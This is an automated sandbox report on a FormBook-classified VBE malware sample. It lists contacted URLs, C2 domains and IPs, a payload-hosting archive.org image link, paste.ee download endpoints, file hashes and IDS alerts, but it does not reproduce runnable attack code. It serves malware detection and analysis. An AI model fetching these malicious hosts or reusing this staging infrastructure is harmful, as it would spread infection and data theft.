                                        https://analytics.paste.eepowershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://paste.eepowershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://aka.ms/pscore6powershell.exe, 00000002.00000002.2415529480.000001F91724C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://ia600102.us.archive.orgpowershell.exe, 00000004.00000002.2265097583.000001FEA7313000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://www.google.compowershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://oneget.orgXpowershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2415529480.000001F917296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgXpowershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://secure.gravatar.compowershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icodllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://paste.eepowershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://go.micropowershell.exe, 00000004.00000002.2265097583.000001FEA6C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.airgame.storeQEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                          https://www.google.com;powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ia600102.us.arXpowershell.exe, 00000004.00000002.2265097583.000001FEA730E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.ecosia.org/newtab/dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ia600102.us.archive.orgpowershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://ac.ecosia.org/autocomplete?q=dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://playchill.top/api/axgames/request?domain=$dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                unknown
                                                https://gamesfunny.top$dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  unknown
                                                  https://code.jquery.com/jquery-3.5.1.min.jsdllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                  https://analytics.paste.ee;powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2415529480.000001F917269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                    https://oneget.orgpowershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    13.248.169.48
                                                    www.autoclean.shopUnited States
                                                    16509AMAZON-02USfalse
                                                    18.163.12.6
                                                    568060007.xyzUnited States
                                                    16509AMAZON-02UStrue
                                                    188.114.96.3
                                                    paste.eeEuropean Union
                                                    13335CLOUDFLARENETUStrue
                                                    207.241.227.242
                                                    ia600102.us.archive.orgUnited States
                                                    7941INTERNET-ARCHIVEUStrue
                                                    172.96.186.204
                                                    elitecbdgummies.netCanada
                                                    32475SINGLEHOP-LLCUStrue
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1530632
                                                    Start date and time:2024-10-10 09:58:59 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 58s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:10092024150836 09.10.2024.vbe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.expl.evad.winVBE@12/6@7/5
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 92
                                                    • Number of non-executed functions: 286
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .vbe
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target QEwzeZKCXN.exe, PID 5908 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 6568 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    TimeTypeDescription
                                                    03:59:58API Interceptor43x Sleep call for process: powershell.exe modified
                                                    04:01:30API Interceptor77576x Sleep call for process: dllhost.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    13.248.169.48RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                    • www.invicta.world/0cd8/
                                                    ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                    • www.catholic.today/1u6c/
                                                    PO#001498.exeGet hashmaliciousFormBookBrowse
                                                    • www.catholic.today/gs9g/
                                                    lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                    • www.comedy.finance/e21k/
                                                    sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                    • www.firstcry.shop/e4x0/
                                                    8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                    • www.firstcry.shop/2mvq/
                                                    BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                    • www.jacquesjanine.online/ey4t/
                                                    fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                    • www.dyme.tech/h7lb/
                                                    jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                    • www.dyme.tech/h7lb/
                                                    Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                    • www.extrem.tech/lwlk/
                                                    188.114.96.3Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                    • www.cc101.pro/59fb/
                                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                                    • servicetelemetryserver.shop/api/index.php
                                                    bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                    • www.rtprajalojago.live/2uvi/
                                                    lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                    • www.serverplay.live/71nl/
                                                    sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                    • www.cc101.pro/0r21/
                                                    E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                    • paste.ee/d/VO2TX
                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • filetransfer.io/data-package/fOmsJ2bL/download
                                                    NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                                    • www.thetahostthe.top/9r5x/
                                                    RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                    • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                                                    74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                    • kuechenundmehr.com/x.htm
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    paste.eeLogistics1.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                    • 188.114.97.3
                                                    Payment.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                    • 188.114.97.3
                                                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    ia600102.us.archive.orgLogistics1.vbsGet hashmaliciousFormBookBrowse
                                                    • 207.241.227.242
                                                    n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    asegurar.vbsGet hashmaliciousUnknownBrowse
                                                    • 207.241.227.242
                                                    Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    AMAZON-02UShttps://w7950.app.blinkops.comGet hashmaliciousUnknownBrowse
                                                    • 18.245.46.55
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 157.175.218.43
                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                    • 13.248.252.114
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 18.217.104.207
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 54.101.122.180
                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                    • 52.222.236.48
                                                    https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                    • 65.9.66.7
                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                    • 52.222.236.120
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 54.182.196.194
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 54.122.159.204
                                                    INTERNET-ARCHIVEUSLogistics1.vbsGet hashmaliciousFormBookBrowse
                                                    • 207.241.227.242
                                                    n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    asegurar.vbsGet hashmaliciousUnknownBrowse
                                                    • 207.241.227.242
                                                    Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 207.241.227.242
                                                    beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 207.241.227.240
                                                    e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                    • 207.241.227.240
                                                    CLOUDFLARENETUShttps://w7950.app.blinkops.comGet hashmaliciousUnknownBrowse
                                                    • 104.26.2.186
                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    Inquiry N TM24-10-09.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 104.21.53.112
                                                    hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 104.21.56.70
                                                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 104.21.2.6
                                                    #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    Logistics1.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    Quarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                    • 104.16.117.116
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.53.8
                                                    AMAZON-02UShttps://w7950.app.blinkops.comGet hashmaliciousUnknownBrowse
                                                    • 18.245.46.55
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 157.175.218.43
                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                    • 13.248.252.114
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 18.217.104.207
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 54.101.122.180
                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                    • 52.222.236.48
                                                    https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                    • 65.9.66.7
                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                    • 52.222.236.120
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 54.182.196.194
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 54.122.159.204
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0e#U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    Logistics1.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    https://subsale24h.com/Get hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    https://unscsupply.goshopgaming.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    • 207.241.227.242
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                    MD5:AADE84B9650AB09D8DC304B168D6D555
                                                    SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                    SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                    SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\SysWOW64\dllhost.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1239949490932863
                                                    Encrypted:false
                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                    MD5:271D5F995996735B01672CF227C81C17
                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Entropy (8bit):3.7283779030496405
                                                    TrID:
                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                    • MP3 audio (1001/1) 32.22%
                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                    • Corel Photo Paint (41/41) 1.32%
                                                    File name:10092024150836 09.10.2024.vbe
                                                    File size:195'080 bytes
                                                    MD5:17cd7d0a0b68a5c484a848750820837a
                                                    SHA1:bff3178427c48734726b5e144c86d0833cd8cc1f
                                                    SHA256:5d14ce5f262c2b1f20ed43231cd1ba696a1eac262da9e20d1415045e1a985eea
                                                    SHA512:6bceea46a01293ce7a0e1cd3b2adec90236e6a6c7fb884212b76ea4e1c7b2d348daec95e27777d0426195c8524d4c439ee1ce2e97b60ab14f8f03209475592a1
                                                    SSDEEP:3072:yrvNl/zPN7afx/lTkAlQYRvdPVJFDSHzeabgt5ptGwT0SbVicSt1Pbc/hW6sBQy4:yrvNlzPNekfY5FQHze1icSY/hW6s9Bpg
                                                    TLSH:EE143C0226EA7008F1F72F5696F959B44F67B969293D821D648C1F4E1BE3E80CD127B3
                                                    File Content Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .p.o.l.l.a.r.d.a.(.i.n.f.l.u.x.o.,. .r.o.t.e.a.r.,. .c.h.e.l.e.a.n.o.,. .m.e.t.a.l.o.t.e.r.a.p.i.a.,. .n.o.m.o.g.r.a.f.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... .
                                                    Icon Hash:68d69b8f86ab9a86
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-10T09:59:51.996903+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995418.163.12.680TCP
                                                    2024-10-10T09:59:51.996903+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995618.163.12.680TCP
                                                    2024-10-10T09:59:51.996903+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649964188.114.96.380TCP
                                                    2024-10-10T10:00:06.037343+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.242443192.168.2.649711TCP
                                                    2024-10-10T10:00:07.219856+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649724188.114.96.3443TCP
                                                    2024-10-10T10:01:27.277973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995518.163.12.680TCP
                                                    2024-10-10T10:01:38.034177+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649958172.96.186.20480TCP
                                                    2024-10-10T10:01:40.545678+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649959172.96.186.20480TCP
                                                    2024-10-10T10:01:43.452562+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649960172.96.186.20480TCP
                                                    2024-10-10T10:01:51.319864+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649963188.114.96.380TCP
                                                    2024-10-10T10:01:56.277471+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649965188.114.96.380TCP
                                                    2024-10-10T10:02:05.197572+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499673.33.130.19080TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 10, 2024 10:00:00.362770081 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:00.362829924 CEST44349711207.241.227.242192.168.2.6
